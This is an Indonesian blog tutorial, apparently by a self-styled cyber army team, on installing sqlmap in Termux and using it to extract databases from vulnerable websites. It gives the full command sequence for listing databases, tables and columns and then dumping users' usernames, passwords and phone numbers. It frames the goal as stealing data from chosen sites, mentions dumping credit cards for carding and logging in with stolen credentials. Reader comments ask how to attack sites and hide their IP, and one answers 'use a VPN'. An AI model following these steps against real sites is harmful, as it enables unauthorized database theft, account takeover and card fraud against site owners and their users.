Skip to content Skip to sidebar Skip to footer

Widget Atas Posting

CARA MENGGUNAKAN SQLMAP DI TERMUX


 Kali Ini Saya Akan Membuat Tutorial SQLMAP Di Termux


   SQLMAP adalah tools opensource yang mendeteksi dan melakukan exoloit pada bug SQL injection secara otomatis. Dengan melakukan seranggan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.

Maka Dari itu, kita bisa mencuri atau mengambil database dari sebuah website yang kita inginkan, tapi harus yang vulnerable ( memiliki celah ) agar bisa di masuki, karna dari celahnya tersebut kita bisa melihat data – data nya, dan belum pasti semua data, dan keberuntungan juga di perlukan :v.

   Dan jika saja kita lagi beruntung, kita bisa saja mendapat CC ( Credit Card / kartu kredit ) bagi yang suka carding, bisa dump cc disini hehe..

Baik, Intronya cukup segitu saja, dan mari langsung menjalankan Tools nya..
~Saya Tidak Bertanggung Jawab Dengan Kesalahan Yang Anda Lakukan~
Ok.. langsung saja kita Jalankan

Bahan- bahan yang di butuhkan :
~HP Dengan Versi Lolipop Ke Atas ( versi 5.0 + )
~Aplikasi Termux ( Termux hanya bisa di HP Versi Lolipop Ke Atas )
~Koneksi Internet Lancar
~Kesabaran :V , Soalnya Perlu pengumpulan Database Nanti, Dan Untuk Cepat Lambat nya, bergantung koneksi internet anda beserta database website nya hehe.

  Yang Pertama :
Buka Aplikasi Termux
~ Kalau sudah, kita update dulu package nya dengan perintah :

     $apt update –y

~ Lanjut dengan Menginstall Python

     $apt  install python python2 –y

~ Lanjut dengan menginstall git agar bisa cloning

     $apt install git

~ Sekarang eksekusi Tool nya


~ Lanjut masuk ke directory Tool

     $cd sqlmap

~ Sekarang jalankan..

     $python2 sqlmap.py


Nahh… Kita Sudah siap Untuk menginstall SQLMAP, skrang tinggal cara penggunaan. :
Kita buat contoh website target : http://www.contoh.com/product.php?id=1
Ok, Itu sebagai  contoh Untuk kita masuki database nya..

Ketikkan Perintah Berikut :

 $python2 sqlmap.py -u http://www.contoh.com/product.php?id=1 --dbs

Dan tekan Enter..
Kalau vuln, Nanti akan Di tunjukkan nama” Database nya, contoh :

*information_schema
*sdgsd4484sd

Nah itulah contoh database nya, Kita buka database
*sdgsd4488sd
Karena yang information_schema nggak ada gunanya :v
Lanjut untuk membuka, ketik perintah :

$python2 sqlmap.py -u http://www.contoh.com/product.php?id=1 –D asgsd4488sd –tables

Nanti akan di beikan informasi” dalam bentuk table, beserta nama- nama dalam table nya,  tapi belum cukup, kita harus membuka lebih dalam lagi..

$ $python2 sqlmap.py -u http://www.contoh.com/product.php?id=1 -D
Asgsd4488sd –T users --columns

Untuk memberikan dalam bentuk Kolom Dari Tabel users, maka disitu nanti akan tertera apa aja yg ada di dalam table nya, tapi biasanya yang ada : email, phone, username, password, phone
Nah tinggal kita dump untuk mengetahui username dan password nya

$ python2 sqlmap.py -u http://www.contoh.com/product.php?id=1 -D
Asgsd4488sd –T users –C username,password,phone –dump

Kalau sudah, nanti akan diberikan Username , password, dan nomor hp, jad itinggal kita masukkan ke website tersebut dan kita sudah bisa memasuki sebagai user ( pengguna )

·        --dbs         = Untuk memberikan Database
·        -D             = Nama Database nya
·        -u              = URL dari website yang mau di dump
·        --tables     = Untuk memberikan nama – nama table
·        -T              = Nama Tabel
·        --columns = Untuk memberikan data yang ada pada table
·        -C             = Nama – nama di dalam kolom
·        --dump     = proses akhir untuk mendapatkan username, password   
                        dan Nomor Handphone





Baik, Sekian Saja yang dapat saya berikan, Jika ada kesalahan saya mohon maaf, dan bisa komentar di bawah J.. Kritik Dan Saran sangat di butuhkan untuk mengembangkan blogspot kita ini.. Wassalam.




#Mr.Dellay
#Adenn
#CYBER|ARMY|TEAM

17 comments for "CARA MENGGUNAKAN SQLMAP DI TERMUX"

  1. Hallo bank saya tadi bisa yang di contohin abang tapi saya mau coba link bokep terus ulang di ulang lagi attack nya terus belum keluar database nya knapa yh bang,,,,tolong dong penjelesannya soal nya saya mau musnahin situs forno,,,,,,thnk

    ReplyDelete
    Replies
    1. udah dapat vuln website nya? kalau belum, cari dulu bg terus gunakan. Terima kasih

      Delete
  2. Gan Passwordnya Hash Jenis Apa ya jadinya??

    ReplyDelete
  3. Gan ko pas saya mau username,password -dump tulisannya unable to read file 'username,password'

    ReplyDelete
    Replies
    1. Mungkin, kolom username dan password nya nggk ada di web yang di inject, coba coba web lain. Terima kasih

      Delete
  4. Gan kalo ada tulisan critical itu apa

    ReplyDelete
  5. [INFO] tried 303/2757 items (11%)
    itu seperti sedang mendownload, apa emang gitu gan. makasih

    ReplyDelete
  6. Saya pakai web contoh dari abang kok scannya lama, emang gitu yak?

    ReplyDelete
  7. bang mau tanya ketika kita menjalankan tool ini apa ip dan data kita tertutup oleh alamat palsu, atau gak bang.... karna sistem cyber pasti liat,

    ReplyDelete
    Replies
    1. Semua kemungkinan bisa terjadi sob. Soalnya tak ada system yang aman. Kita cuma berusaha untuk meminimalisir hal tersebut.🙈

      Delete
    2. Pakai VPN mas bro

      Delete
  8. This comment has been removed by the author.

    ReplyDelete
  9. Gan ada aqua?,aye gans tq hehe

    ReplyDelete
  10. Wah pada mastah Hem gila emang

    ReplyDelete